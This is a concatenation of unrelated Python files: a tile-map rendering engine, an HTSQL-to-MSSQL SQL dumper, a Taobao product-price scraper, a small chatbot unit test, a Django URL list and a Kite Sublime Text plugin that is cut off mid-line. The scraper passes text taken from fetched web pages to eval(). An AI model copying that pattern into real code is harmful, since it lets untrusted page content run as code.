sheet_vault.tile_size t_w, t_h = self.__tile_size if t_w < 4 or t_h < 4: raise Exception('Tile size cannot be smaller than 4x4. Current size: %dx%d' % (t_w, t_h)) else: if sheet_vault.tile_size != self.__tile_size: raise Exception('Cannot load sheet vault with incompatible tile size: %s' % sheet_vault) vault = Vault.get_instance(sheet_vault) alias = sheet_vault.__name__ if alias is None else alias self.__vaults[alias] = vault filename = os.path.relpath(sheet_vault.__file__, os.getcwd()) filename = os.path.splitext(filename)[0] # Throw away extension - Python shall decide. if not self.__config.has_section('tilesheets'): self.__config.add_section('tilesheets') self.__config.set('tilesheets', alias, filename) if not self.__default_sheet: self.__default_sheet = self.__vaults.keys()[0] def load_matrix(self, path): self.__matrix.data_path = path if not self.__config.has_section('matrix'): self.__config.add_section('matrix') self.__config.set('matrix', 'data_path', path) def load_sheet_file(self, filename, alias=None): sheet_path = os.path.dirname(filename) sheet_file = os.path.basename(filename) if sheet_path: sys.path.insert(0, os.path.abspath(sheet_path)) sheet_file = os.path.splitext(sheet_file)[0] # Throw away extension - Python shall decide. module = __import__(sheet_file, globals(), locals(), [], -1) self.add_sheet(module, alias) def load_config(self, filename): # TODO do we need to reset everything here or can we block somehow if something has been set? config = self.__config config.read(filename) base_dir = os.path.dirname(filename) for section in config.sections(): if section == 'tilesheets': for alias, filename in config.items('tilesheets'): filename = os.path.join(base_dir, filename) self.load_sheet_file(filename, alias) elif section == 'matrix': for key, val in config.items('matrix'): if key == 'data_path': val = os.path.join(base_dir, val) self.load_matrix(val) else: raise Exception('Unknown key for section matrix found: %s' % key) elif section == 'layer.order_change': for z, new_z in config.items('layer.order_change'): z = int(z) new_z = int(new_z) try: self.__layer_config[z]['reorder'] = new_z except KeyError: self.__layer_config[z] = dict(reorder=new_z) elif section == 'layer.sector': for key, val in config.items('layer.sector'): if key == 'size': val = tuple(map(int, val.split(','))) self.__sector_size = val elif key == 'cache_path': val = os.path.join(base_dir, val) self._sector_cache_path = val if not os.path.exists(val): os.makedirs(val) # We just ignore unknown sections. # else: # raise Exception('Unknown section in config file found: %s' % section) # config.write(sys.stdout) # @time def update_sectors(self): # timer = Timer() # timer.start() # Gather the boundaries. m_x, m_y = map(float, self.real_position) # real position of tilematrix t_w, t_h = map(float, (self.__tile_size)) # tile size s_w, s_h = map(float, (self.__sector_size)) # sector size w_w, w_h = map(float, (self.window.width, self.window.height)) # window size # m_w, m_h = map(int, (ceil(w_w / t_w), ceil(w_h / t_h))) # map size # Calculate all necessary sector rects. top_left = map(floor, (-m_x / t_w, -m_y / t_h)) bottom_right = map(ceil, ((-m_x + w_w) / t_w, (-m_y + w_h) / t_h)) o_x, o_y = ceil(top_left[0] % s_w / s_w) * s_w, ceil(top_left[1] % s_h / s_h) * s_h m_w, m_h = (bottom_right[0] - top_left[0] + o_x), (bottom_right[1] - top_left[1] + o_y) # m_w, m_h = (bottom_right[0] - top_left[0]), (bottom_right[1] - top_left[1]) s_num_w, s_num_h = map(ceil, (m_w / s_w, m_h / s_h)) # print(m_x, t_w, m_y, t_h) # print('tl =', top_left) # print(m_x, w_w, t_w, m_y, w_h, t_h) # print('br =', bottom_right) # print('s_w, s_h =', s_w, s_h) # print('o_x, o_y =', o_x, o_y) # print('num horiz tiles =', m_w) # print('num vert tiles =', m_h) # print('num horiz sectors =', s_num_w) # print('num vert sectors =', s_num_h) # And make them ints. top_left = map(int, top_left) bottom_right = map(int, bottom_right) t_w, t_h = map(int, (t_w, t_h)) m_w, m_h = map(int, (m_w, m_h)) s_w, s_h = map(int, (s_w, s_h)) s_num_w, s_num_h = map(int, (s_num_w, s_num_h)) # Guess our default if no sheet is being mentioned in a coord. default_sheet = self.__default_sheet # timer.stop() # print 1, timer.result # timer.start() matrix_rect = ( top_left[0] // s_w * s_w, top_left[1] // s_h * s_h, s_w * s_num_w, s_h * s_num_h, ) if matrix_rect == self.__last_matrix_rect: return self.__last_matrix_rect = matrix_rect # Get the rect. matrix_layers = self.__matrix.get_rect(*matrix_rect) # print matrix_layers # timer.stop() # print 2, timer.result # timer.start() # Separate layer and sector data. layer_data = dict() for layer_no, matrix in matrix_layers.iteritems(): # Ensure layer. try: layer_matrix = layer_data[layer_no] except KeyError: layer_matrix = layer_data[layer_no] = dict() for (x, y), id in matrix.iteritems(): pos_x = x // s_w x = x % s_w pos_y = y // s_h y = y % s_h # print '*** sector', pos_x, pos_y # Separate data. # DISABLE THIS AFTER DEBUGGING! # if (x, y) == (0, 0): # col = {0: '73'} # print x, y, col # Normalize data format. if '/' in id: sheet, id = id.split('/', 1) else: sheet = default_sheet # Ensure sector. try: sector_matrix = layer_matrix[(pos_x, pos_y)] except KeyError: sector_matrix = layer_matrix[(pos_x, pos_y)] = { sheet: { (x, y): id } } else: # Set sector data. try: sector_matrix[sheet][x, y] = id except KeyError: sector_matrix[sheet] = {(x, y): id} # timer.stop() # print 3, timer.result # timer.start() # Build layers and sectors. layers = self.__layers vaults = self.__vaults required_sectors = set() for order_id, layer_data in layer_data.items(): # print 'layer', order_id try: layer = layers[order_id] except KeyError: if order_id in self.__layer_config: _order_id = self.__layer_config[order_id].get('reorder', order_id) else: _order_id = order_id layer = layers[order_id] = TileMatrixLayer(_order_id, vaults) # print layer # We do this because we need a valid window and group for the next step. self.add_node(layer) for pos, sector_data in layer_data.iteritems(): if not layer.has_sector(pos): # print 12345, top_left, pos x = pos[0] * t_w * s_w y = pos[1] * t_h * s_h # print 'sector', pos, x, y layer.add_sector(pos, x, y, sector_data, self.__sector_size, self.__tile_size) required_sectors.add((order_id, pos)) # timer.stop() # print 4, timer.result # timer.start() # return # print(required_sectors) # Cleanup sectors which are off the screen. for order_id, layer in layers.items(): for id, data in layer._sectors.items(): x, y, sector = data # pos = sector.position sector_id = (order_id, (x // (t_w * s_w), y // (t_h * s_h))) # print sector_id if sector_id not in required_sectors: # print('***********', id, data, pos, (w_w, w_h), (-t_w * s_w, -t_h * s_h)) # print('drop', id) layer.remove_sector(id) # timer.stop() # print 5, timer.result # @time def rebuild(self): # Throw away old layers. self.remove_all() self.__layers.clear() self.__last_map_pos = (None, None), (None, None) self.__last_matrix_rect = None self.update_sectors() # @time def add_to(self, node): super(TileMatrix, self).add_to(node) if not self._child_nodes: self.rebuild() # self._update_real_position() def set_sector_size(self, width, height): self.__sector_size = width, height if self.window: self.rebuild() # @time def _update_real_position(self): super(TileMatrix, self)._update_real_position() if not self.window: return x, y = map(lambda v: -v, self.real_position) t_w, t_h = self.__tile_size # s_w, s_h = self.__sector_size w = t_w # * s_w h = t_h # * s_h last_map_pos, last_map_coords = self.__last_map_pos if x > last_map_coords[0]: crp_x = ceil(x / float(w)) else: crp_x = floor(x / float(w)) if y > last_map_coords[1]: crp_y = ceil(y / float(h)) else: crp_y = floor(y / float(h)) cur_map_pos = crp_x, crp_y # print (cur_map_pos, (x, y)), self.__last_map_pos if last_map_pos != cur_map_pos: # print (cur_map_pos, (x, y)), self.__last_map_pos self.update_sectors() self.__last_map_pos = cur_map_pos, (x, y) # @time def get_layer(self, z): layers = self.__layers vaults = self.__vaults try: layer = layers[z] except KeyError: if z in self.__layer_config: order = self.__layer_config[z].get('reorder', z) else: order = z layer = layers[z] = TileMatrixLayer(order, vaults) # print layer self.add_node(layer) return layer def translate_to_pos(self, x, y): tile_size = self.__tile_size return x * tile_size[0], y * tile_size[1] def get_boundaries(self): left, top, right, bottom = self.__matrix.boundaries t_w, t_h = self.__tile_size return left * t_w, top * t_h, right * t_w, bottom * t_h def get_tile_id_at(self, x, y, z): value = self.__matrix.get_point(x, y, z) if value is not None: if type(value) is dict: return value.copy() else: return value return None @time def set_tiles_at(self, points): if type(points) is GeneratorType: points = set(tuple(point) for point in points) layer_data = dict( (z, filter(lambda point: point[2] == z, points)) for _, _, z, _ in points ) print layer_data for layer_no, points in layer_data.iteritems(): layer = self.get_layer(layer_no) # TODO Generate sheet and sector data. # TODO Modify existing sectors or create new ones. # TODO modify matrix. # TODO rework to react on matrix.data.saved event! def _rebuild_index(self): s_w, s_h = self._sector_size print('Rebuilding matrix index...') for root, dirs, files in os.walk(self._data_path): for filename in files: if filename.startswith('i.') and filename.endswith('.csv'): os.remove(os.path.join(root, filename)) indexes = dict() top, left, bottom, right = 0, 0, 0, 0 for root, dirs, files in os.walk(self._data_path): files = sorted(files) # print(root, dirs, files) print('Found %d sectors to index...' % len(files)) for filename in files: if not (filename.startswith('s.') and filename.endswith('.csv')): continue # print('Inspecting sector file: %s' % filename) reader = csv.reader(open(os.path.join(root, filename)), skipinitialspace=True) s_x, s_y = map(int, filename[2:-4].split(',')) for x, y, z, id in reader: x = (s_x * s_w) + int(x) y = (s_y * s_h) + int(y) top = min(top, y) left = min(left, x) bottom = max(bottom, y) right = max(right, x) # TODO track z axis min and max. sheet, tile_id = id.split('/') # Update index of specific tile. if id not in indexes: id_ = '%s,%s' % (sheet, tile_id) index_filename = os.path.join(self._data_path, 'i.%s.csv' % id_) indexes[id] = csv.writer(open(index_filename, 'w')) indexes[id].writerow((x, y, z)) # Update index of used tilesheet. if sheet not in indexes: index_filename = os.path.join(self._data_path, 'i.%s.csv' % sheet) indexes[sheet] = csv.writer(open(index_filename, 'w')) indexes[sheet].writerow((x, y, z, tile_id)) index_filename = os.path.join(self._data_path, 'b.csv') writer = csv.writer(open(index_filename, 'w')) writer.writerow((top, left, bottom, right)) self._top, self._left, self._bottom, self._right = top, left, bottom, right print('Finished rebuilding matrix index.') def find_in_matrix_by_tilesheet(self, value): if '/' in value: value = '%s,%s' % tuple(value.split('/')) index_filename = os.path.join(self.__matrix.data_path, 'i.%s.csv' % value) if os.path.exists(index_filename): reader = csv.reader(open(index_filename)) return [map(int, row[:3]) + row[3:] for row in reader] else: return []
# # Copyright (c) 2006-2013, Prometheus Research, LLC # from htsql.core.adapter import adapt from htsql.core.error import Error from htsql.core.domain import (BooleanDomain, TextDomain, IntegerDomain, DecimalDomain, DateDomain, TimeDomain, DateTimeDomain) from htsql.core.tr.frame import ColumnPhrase, ReferencePhrase, LiteralPhrase from htsql.core.tr.dump import (FormatName, FormatPlaceholder, DumpBranch, DumpBySignature, DumpFromPredicate, DumpToPredicate, DumpIsTotallyEqual, DumpBoolean, DumpInteger, DumpDecimal, DumpFloat, DumpDate, DumpTime, DumpDateTime, DumpToInteger, DumpToFloat, DumpToDecimal, DumpToText, DumpToDate, DumpToTime, DumpToDateTime) from htsql.core.tr.fn.dump import (DumpRound, DumpRoundTo, DumpTrunc, DumpTruncTo, DumpLength, DumpConcatenate, DumpSubstring, DumpTrim, DumpToday, DumpNow, DumpExtractYear, DumpExtractMonth, DumpExtractDay, DumpExtractHour, DumpExtractMinute, DumpExtractSecond, DumpMakeDate, DumpMakeDateTime, DumpDateIncrement, DumpDateDecrement, DumpDateTimeIncrement, DumpDateTimeDecrement, DumpDateDifference) import math class MSSQLFormatName(FormatName): def __call__(self): self.stream.write(u"[%s]" % self.value.replace(u"]", u"]]")) class MSSQLFormatPlaceholder(FormatPlaceholder): def __call__(self): self.stream.write(u"%s") class MSSQLDumpBranch(DumpBranch): def dump_select(self): aliases = self.state.select_aliases_by_tag[self.frame.tag] self.write(u"SELECT ") self.indent() if self.frame.limit is not None: self.write(u"TOP "+unicode(self.frame.limit)) self.newline() for index, phrase in enumerate(self.frame.select): alias = None if self.state.hook.with_aliases: alias = aliases[index] if isinstance(phrase, ColumnPhrase): if alias == phrase.column.name: alias = None if isinstance(phrase, ReferencePhrase): target_alias = (self.state.select_aliases_by_tag [phrase.tag][phrase.index]) if alias == target_alias: alias = None if alias is not None: self.format("{selection} AS {alias:name}", selection=phrase, alias=alias) else: self.format("{selection}", selection=phrase) if index < len(self.frame.select)-1: self.write(u",") self.newline() self.dedent() def dump_limit(self): assert self.frame.offset is None class MSSQLDumpFromPredicate(DumpFromPredicate): def __call__(self): if self.phrase.is_nullable: self.format("(CASE WHEN {op} THEN 1 WHEN NOT {op} THEN 0 END)", self.arguments) else: self.format("(CASE WHEN {op} THEN 1 ELSE 0 END)", self.arguments) class MSSQLDumpToPredicate(DumpToPredicate): def __call__(self): self.format("({op} <> 0)", self.arguments) class MSSQLDumpBoolean(DumpBoolean): def __call__(self): if self.value is True: self.write(u"1") if self.value is False: self.write(u"0") class MSSQLDumpInteger(DumpInteger): def __call__(self): if not (-2**63 <= self.value < 2**63): raise Error("Got invalid integer value") if abs(self.value) < 2**31: if self.value >= 0: self.write(unicode(self.value)) else: self.write(u"(%s)" % self.value) else: self.write(u"CAST(%s AS BIGINT)" % self.value) class MSSQLDumpFloat(DumpFloat): def __call__(self): assert not math.isinf(self.value) and not math.isnan(self.value) value = repr(self.value) if 'e' not in value and 'E' not in value: value = value+'e0' if value[0] == '-': value = "(%s)" % value self.write(unicode(value)) class MSSQLDumpDecimal(DumpDecimal): def __call__(self): assert self.value.is_finite() value = str(self.value) if 'E' in value: value = "CAST(%s AS DECIMAL(38,19))" % value elif '.' not in value: value = "%s." % value if value[0] == '-': value = "(%s)" % value self.write(unicode(value)) class MSSQLDumpDate(DumpDate): def __call__(self): self.format("CAST({value:literal} AS DATETIME)", value=unicode(self.value)) class MSSQLDumpTime(DumpTime): def __call__(self): value = (self.value.hour*3600 + self.value.minute*60 + self.value.second + self.value.microsecond/1000000.0) / 86400.0 value = repr(value) if 'e' not in value and 'E' not in value: value = value+'e0' self.write(unicode(value)) class MSSQLDumpDateTime(DumpDateTime): def __call__(self): value = self.value.replace(tzinfo=None) if not value.microsecond: value = unicode(value) else: value = unicode(value)[:-3] self.format("CAST({value:literal} AS DATETIME)", value=value) class MSSQLDumpToInteger(DumpToInteger): def __call__(self): self.format("CAST({base} AS INT)", base=self.base) class MSSQLDumpToFloat(DumpToFloat): def __call__(self): self.format("CAST({base} AS FLOAT)", base=self.base) class MSSQLDumpToDecimal(DumpToDecimal): def __call__(self): self.format("CAST({base} AS DECIMAL(38,19))", base=self.base) class MSSQLDumpIntegerToDecimal(MSSQLDumpToDecimal): adapt(IntegerDomain, DecimalDomain) def __call__(self): self.format("CAST({base} AS DECIMAL(38))", base=self.base) class MSSQLDumpToText(DumpToText): def __call__(self): self.format("CAST({base} AS VARCHAR(MAX))", base=self.base) class MSSQLDumpBooleanToText(DumpToText): adapt(BooleanDomain, TextDomain) def __call__(self): if self.base.is_nullable: self.format("(CASE WHEN {base} <> 0 THEN 'true'" " WHEN NOT {base} = 0 THEN 'false' END)", base=self.base) else: self.format("(CASE WHEN {base} <> 0 THEN 'true' ELSE 'false' END)", base=self.base) class MSSQLDumpDateToText(DumpToText): adapt(DateDomain, TextDomain) def __call__(self): self.format("SUBSTRING(CONVERT(VARCHAR, {base}, 21), 1, 10)", base=self.base) class MSSQLDumpTimeToText(DumpToText): adapt(TimeDomain, TextDomain) def __call__(self): self.format("SUBSTRING(CONVERT(VARCHAR, CAST({base} AS DATETIME), 21)," " 12, 12)", base=self.base) class MSSQLDumpDateTimeToText(DumpToText): adapt(DateTimeDomain, TextDomain) def __call__(self): self.format("CONVERT(VARCHAR, {base}, 21)", base=self.base) class MSSQLDumpTextToDate(DumpToDate): adapt(TextDomain, DateDomain) def __call__(self): self.format("CAST(FLOOR(CAST(CAST({base} AS DATETIME) AS FLOAT))" " AS DATETIME)", base=self.base) class MSSQLDumpDateTimeToDate(DumpToDate): adapt(DateTimeDomain, DateDomain) def __call__(self): self.format("CAST(FLOOR(CAST({base} AS FLOAT)) AS DATETIME)", base=self.base) class MSSQLDumpTextToTime(DumpToTime): adapt(TextDomain, TimeDomain) def __call__(self): self.format("CAST(CAST('1900-01-01 ' + {base} AS DATETIME) AS FLOAT)", base=self.base) class MSSQLDumpDateTimeToTime(DumpToTime): adapt(DateTimeDomain, TimeDomain) def __call__(self): self.format("(CAST({base} AS FLOAT) - FLOOR(CAST({base} AS FLOAT)))", base=self.base) class MSSQLDumpTextToDateTime(DumpToDateTime): adapt(TextDomain, DateTimeDomain) def __call__(self): self.format("CAST({base} AS DATETIME)", base=self.base) class MSSQLDumpDateToDateTime(DumpToDateTime): adapt(DateDomain, DateTimeDomain) def __call__(self): self.format("{base}", base=self.base) class MSSQLDumpIsTotallyEqual(DumpIsTotallyEqual): def __call__(self): self.format("((CASE WHEN ({lop} = {rop}) OR" " ({lop} IS NULL AND {rop} IS NULL)" " THEN 1 ELSE 0 END) {polarity:switch{<>|=}} 0)", self.arguments, self.signature) class MSSQLDumpRound(DumpRound): def __call__(self): if isinstance(self.phrase.domain, DecimalDomain): self.format("CAST(ROUND({op}, 0) AS DECIMAL(38))", self.arguments) else: self.format("ROUND({op}, 0)", self.arguments) class MSSQLDumpRoundTo(DumpRoundTo): def __call__(self): scale = None if (isinstance(self.phrase.precision, LiteralPhrase) and self.phrase.precision.value is not None): scale = self.phrase.precision.value if scale < 0: scale = 0 if scale is not None: self.format("CAST(ROUND({op}, {precision})" " AS DECIMAL(38,{scale:pass}))", self.arguments, self.signature, scale=unicode(scale)) else: self.format("ROUND({op}, {precision})", self.arguments, self.signature) class MSSQLDumpTrunc(DumpTrunc): def __call__(self): if isinstance(self.phrase.domain, DecimalDomain): self.format("CAST(ROUND({op} -" " (CASE WHEN {op} >= 0 THEN 0.5 ELSE -0.5 END), 0)" " AS DECIMAL(38))", self.arguments) else: self.format("ROUND({op} -" " (CASE WHEN {op} >= 0 THEN 0.5 ELSE -0.5 END), 0)", self.arguments) class MSSQLDumpTruncTo(DumpTruncTo): def __call__(self): scale = None if (isinstance(self.phrase.precision, LiteralPhrase) and self.phrase.precision.value is not None): scale = self.phrase.precision.value if scale < 0: scale = 0 if scale is not None: self.format("CAST(ROUND({op} -" " (CASE WHEN {op} >= 0 THEN 0.5 ELSE -0.5 END) /" " CAST(POWER(10e0, {precision}) AS DECIMAL(38,19))," " {precision})" " AS DECIMAL(38,{scale:pass}))", self.arguments, self.signature, scale=unicode(scale)) else: self.format("ROUND({op} -" " (CASE WHEN {op} >= 0 THEN 0.5 ELSE -0.5 END) /" " CAST(POWER(10e0, {precision}) AS DECIMAL(38,19))," " {precision})", self.arguments, self.signature) class MSSQLDumpLength(DumpLength): template = "LEN({op})" class MSSQLDumpConcatenate(DumpConcatenate): template = "({lop} + {rop})" class MSSQLDumpSubstring(DumpSubstring): def __call__(self): if self.phrase.length is None: self.format("SUBSTRING({op}, {start}, LEN({op}))", self.phrase) else: self.format("SUBSTRING({op}, {start}, {length})", self.phrase) class MSSQLDumpTrim(DumpTrim): def __call__(self): if self.signature.is_left and not self.signature.is_right: self.format("LTRIM({op})", self.arguments) elif not self.signature.is_left and self.signature.is_right: self.format("RTRIM({op})", self.arguments) else: self.format("LTRIM(RTRIM({op}))", self.arguments) class MSSQLDumpToday(DumpToday): template = "CAST(FLOOR(CAST(GETDATE() AS FLOAT)) AS DATETIME)" class MSSQLDumpNow(DumpNow): template = "GETDATE()" class MSSQLDumpExtractYear(DumpExtractYear): template = "DATEPART(YEAR, {op})" class MSSQLDumpExtractMonth(DumpExtractMonth): template = "DATEPART(MONTH, {op})" class MSSQLDumpExtractDay(DumpExtractDay): template = "DATEPART(DAY, {op})" class MSSQLDumpExtractHour(DumpExtractHour): template = "DATEPART(HOUR, {op})" class MSSQLDumpExtractMinute(DumpExtractMinute): template = "DATEPART(MINUTE, {op})" class MSSQLDumpExtractSecond(DumpExtractSecond): template = ("(DATEPART(SECOND, {op}) +" " DATEPART(MILLISECOND, {op}) / 1000e0)") class MSSQLDumpMakeDate(DumpMakeDate): template = ("DATEADD(DAY, {day} - 1," " DATEADD(MONTH, {month} - 1," " DATEADD(YEAR, {year} - 2001," " CAST('2001-01-01' AS DATETIME))))") class MSSQLDumpMakeDateTime(DumpMakeDateTime): def __call__(self): template = ("DATEADD(DAY, {day} - 1," " DATEADD(MONTH, {month} - 1," " DATEADD(YEAR, {year} - 2001," " CAST('2001-01-01' AS DATETIME))))") if self.phrase.hour is not None: template = "DATEADD(HOUR, {hour}, %s)" % template if self.phrase.minute is not None: template = "DATEADD(MINUTE, {minute}, %s)" % template if self.phrase.second is not None: template = "DATEADD(MILLISECOND, 1000 * {second}, %s)" % template self.format(template, self.arguments) class MSSQLDumpDateIncrement(DumpDateIncrement): template = "({lop} + {rop})" class MSSQLDumpDateTimeIncrement(DumpDateTimeIncrement): template = "({lop} + {rop})" class MSSQLDumpDateDecrement(DumpDateDecrement): template = "({lop} - {rop})" class MSSQLDumpDateTimeDecrement(DumpDateTimeDecrement): template = "({lop} - {rop})" class MSSQLDumpDateDifference(DumpDateDifference): template = "DATEDIFF(DAY, {rop}, {lop})"
import re import requests from bs4 import BeautifulSoup import pandas as pd import numpy as np def getHTMLText(url): try: header = {"user-agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36"} r = requests.get(url, timeout = 20, headers = header) print(r.status_code) r.raise_for_status() r.encoding = r.apparent_encoding with open('web.html', 'w') as f: f.write(r.text) f.close return r.text except: print("Failed on fetch: " + url) return "" def parsePage(ilt, html): try: plt = re.findall(r'\"view_price\"\:\"[\d\.]*\"', html) tlt = re.findall(r'\"raw_title\"\:\".*?\"', html) for i in range(len(plt)): price = eval(plt[i].split(':')[1]) title = eval(tlt[i].split(':')[1]) ilt.append([price, title]) except: print("failed to parse") def parsePage_soup(html): soup = BeautifulSoup(html, "html.parser") items = soup.find('div', class_ = "m-itemlist") item_list = items.find_all('div', class_ = "item") price_list = [] name_list = [] url_list = [] for item in item_list: p = item.find('div', class_ = "price g_price g_price-highlight") price = p.strong.string.replace('\n', '') price = price.replace(' ', '') price_list.append(p.span.string + price) text_temp = item.find('div', class_ = 'ctx-box J_MouseEneterLeave J_IconMoreNew') u = text_temp.find('a', class_ = "J_ClickStat") url_list.append(u['href']) name = "" for str in u.strings: name = name + str name = name.replace('\n', '') name = name.replace(' ', '') name_list.append(name) ilt = {'price': price_list, 'name': name_list, 'url' : url_list} return ilt def printGoodsList(ilt): tplt = "{:4}\t{:8}\t{:16}" print(tplt.format("序号", "价格¥", "商品名称")) count = 0 for g in ilt: count = count + 1 print(tplt.format(count, g[0], g[1])) def saveGoodsList(ilt): df = pd.DataFrame(ilt) df.to_csv("dress_Price_comparsion.csv") def main(): goods = '裙子' depth = 2 # pages to be scratch start_url = 'https://s.taobao.com/search?q='+goods infoList = [] # for i in range(depth): # try: # url = start_url + "&s=" + str(44*i) # html = getHTMLText(url) # parsePage_soup(infoList, html) # except: # print('Failed, url: ' + start_url + "&s=" + str(44*i)) # continue with open("裙子_淘宝搜索.html", 'r') as f: html = f.read() f.close() info = parsePage_soup(html) saveGoodsList(info) parsePage(infoList, html) printGoodsList(infoList) if __name__ == "__main__": main()
import unittest import os from programy.processors.post.removehtml import RemoveHTMLPostProcessor from programy.bot import Bot from programy.brain import Brain from programy.config.sections.brain.brain import BrainConfiguration from programy.config.sections.bot.bot import BotConfiguration class RemoveHTMLTests(unittest.TestCase): def setUp(self): self.bot = Bot(Brain(BrainConfiguration()), config=BotConfiguration()) def test_remove_html(self): processor = RemoveHTMLPostProcessor() result = processor.process(self.bot, "testid", "Hello World") self.assertIsNotNone(result) self.assertEqual("Hello World", result) result = processor.process(self.bot, "testid", "Hello <br/> World") self.assertIsNotNone(result) if os.name == 'posix': self.assertEqual("Hello\nWorld", result) elif os.name == 'nt': self.assertEqual("Hello\r\nWorld", result) else: raise Exception("Unknown os [%s]"%os.name) result = processor.process(self.bot, "testid", "Hello <br /> World") self.assertIsNotNone(result) if os.name == 'posix': self.assertEqual("Hello\nWorld", result) elif os.name == 'nt': self.assertEqual("Hello\r\nWorld", result) else: raise Exception("Unknown os [%s]"%os.name)
from django.urls import path from . import views urlpatterns = [ path('', views.home, name="projects"), path('project/<str:pk>/', views.project, name="project"), ]
import sublime import sublime_plugin import hashlib import htmlmin import json import sys from http.client import CannotSendRequest from jinja2 import Template from os.path import realpath from threading import Lock from urllib.parse import quote from ..lib import deferred, keymap, link_opener, logger, settings, requests, languages from ..lib.errors import ExpectedError from ..lib.file_system import path_for_url from ..setup import is_development, os_version, package_version MAX_FILE_SIZE = 1048576 # 1 MB default __all__ = [ 'EventDispatcher', 'CompletionsHandler', 'SignaturesHandler', 'HoverHandler', 'StatusHandler', 'MaxFileSizeUpdater', ] def _is_view_supported(view): return view.file_name() is not None and any( view.file_name().endswith(ext) for ext in languages.SUPPORTED_EXTS ) def _check_view_size(view): return view.size() <= MAX_FILE_SIZE def _get_view_substr(view, start, end): return view.substr(sublime.Region(start, end)) def _get_word(view, point): word_region = view.word(point) return _get_view_substr(view, word_region.a, word_region.b) def _in_function_call(view, point): # The first matched scope is for 3176, and the second is for 3200. Both # are checked here as a hacky fix to account for changes in the API. We # should instead factor version handling logic into a separate module. return ((view.match_selector(point, 'meta.function-call.python') or view.match_selector(point, 'meta.function-call.arguments.python')) and not view.match_selector(point, 'variable.function.python')) def _at_function_call_begin(view, point): return (_in_function_call(view, point) and view.match_selector(point, 'punctuation.section.arguments.begin.python')) def _at_function_call_end(view, point): return (_in_function_call(view, point) and view.match_selector(point, 'punctuation.section.arguments.end.python')) def _in_empty_function_call(view, point): return (_at_function_call_begin(view, point - 1) and _at_function_call_end(view, point)) def _md5(text): return hashlib.md5(str.encode(text)).hexdigest() class EventDispatcher(sublime_plugin.EventListener): """Listener which forwards editor events to the event endpoint and also fetches completions and function signature information when the proper event triggers are fired. """ _last_selection_region = None def on_modified(self, view): self.__class__._handle(view, 'edit') def on_selection_modified(self, view): self.__class__._handle(view, 'selection') @classmethod def _handle(cls, view, action): if not _is_view_supported(view): return # Workaround to handle cloned views # See https://github.com/SublimeTextIssues/Core/issues/289 view = sublime.active_window().active_view() deferred.defer(requests.kited_post, '/clientapi/editor/event', data=cls._event_data(view, action)) if action == 'selection': select_region = cls._view_region(view) cls._last_selection_region = select_region if (select_region is not None and _in_function_call(view, select_region['end'])): if SignaturesHandler.is_activated(): SignaturesHandler.queue_signatures(view, select_region['end']) else: SignaturesHandler.hide_signatures(view) if action == 'edit' and _check_view_size(view): edit_region = cls._view_region(view) edit_type, num_chars = cls._edit_info(cls._last_selection_region, edit_region) if edit_type == 'insertion' and num_chars == 1: if view.settings().get('auto_complete'): CompletionsHandler.queue_completions(view, edit_region['end']) elif edit_type == 'deletion' and num_chars > 1: CompletionsHandler.hide_completions(view) if (edit_region is not None and _in_function_call(view, edit_region['end'])): if (settings.get('show_function_signatures', True) or SignaturesHandler.is_activated()): SignaturesHandler.queue_signatures(view, edit_region['end']) else: SignaturesHandler.hide_signatures(view) @staticmethod def _view_region(view): if len(view.sel()) != 1: return None r = view.sel()[0] return { 'file': view.file_name(), 'begin': r.begin(), 'end': r.end(), } @staticmethod def _edit_info(selection, edit): no_info = (None, None) if (selection is None or edit is None or selection['file'] != edit['file']): return no_info if edit['end'] > selection['end']: return 'insertion', edit['end'] - selection['end'] if edit['end'] < selection['end']: return 'deletion', selection['end'] - edit['end'] return no_info @staticmethod def _event_data(view, action): text = view.substr(sublime.Region(0, view.size())) if not _check_view_size(view): action = 'skip' text = '' return { 'source': 'sublime3', 'filename': realpath(view.file_name()), 'text': text, 'action': action, 'selections': [{'start': r.a, 'end': r.b, 'encoding': 'utf-32'} for r in view.sel()], 'editor_version': sublime.version(), 'plugin_version': package_version(), } class CompletionsHandler(sublime_plugin.EventListener): """Listener which handles completions by preemptively forwarding requests to the completions endpoint and then running the Sublime `auto_complete` command. """ _lock = Lock() # The last buffer location at which completions were requested. This value # gets updated on every completions request, regardless of whether or not # a new set of completions are initialized. _last_location = None # The last prefix at which completions were requested. This value gets # updated on every completions request, regardless of whether or not a # new set of completions are initialized. _last_prefix = None # The last list of completions that were received from the backend. This # value gets updated on every completions request, regardless of whether # or not a new set of completions are initialized. _last_received_completions = [] # The last character that triggered completions. This value gets updated on # every completions request. _last_trigger_char = None # The last buffer location at which completions were initialized. This # value only gets changed when a new set of completions is sent back to # the UI. _last_init_location = None # The last prefix that was recorded at completions initialization. This # value only gets changed when a new set of completions is sent back to # the UI. _last_init_prefix = None # The last list of completions that were initialized. This value only gets # changed when a new set of completions is sent back to the UI. _last_init_completions = [] def on_query_completions(self, view, prefix, locations): # Prevent completions from showing up in non-active views if sublime.active_window().active_view().id() != view.id(): return None cls = self.__class__ if not _is_view_supported(view): return None if not _check_view_size(view): return None if len(locations) != 1: return None with cls._lock: if cls._last_location is None: cls._last_received_completions = [] cls._last_init_completions = [] cls._last_location = None cls.queue_completions(view, locations[0]) return None if (cls._last_location != locations[0] and cls._last_received_completions): logger.debug('completions location mismatch: {} != {}' .format(cls._last_location, locations[0])) cls._clear_cache() completions = None if (cls._last_location == locations[0] and cls._last_received_completions): completions = self._flatten_completions( cls._last_received_completions) cls._last_init_completions = cls._last_received_completions cls._last_init_location = cls._last_location cls._last_init_prefix = prefix return completions def on_post_text_command(self, view, command_name, args): if command_name not in ('prev_field', 'next_field', 'commit_completion', 'insert_best_completion'): return if len(view.sel()) != 1: return cls = self.__class__ region = view.sel()[0] on_placeholder = not region.empty() # we must only show completions if a placeholder was selected # there's no way to be notified when a particular completion item was # inserted # the closest thing we can do is to show completions # only when a non-empty selection (i.e. size > 1) is present after the # command was executed if on_placeholder: # a reversed region might have region.a > region.b a, b = sorted([region.a, region.b]) cls.queue_completions(view, [a, b]) if command_name in ('commit_completion', 'insert_best_completion'): if settings.get('replace_text_after_commit_completion', True): cls._process_replace_text(view, region) cls._last_init_completions = [] cls._last_init_prefix = None cls._last_location = None logger.debug('cleared completions') @classmethod def queue_completions(cls, view, location): deferred.defer(cls._request_completions, view, cls._event_data(view, location)) @classmethod def hide_completions(cls, view): with cls._lock: cls._clear_cache() view.run_command('hide_auto_complete') @classmethod def _process_replace_text(cls, view, region): inserted_completion, is_snippet = 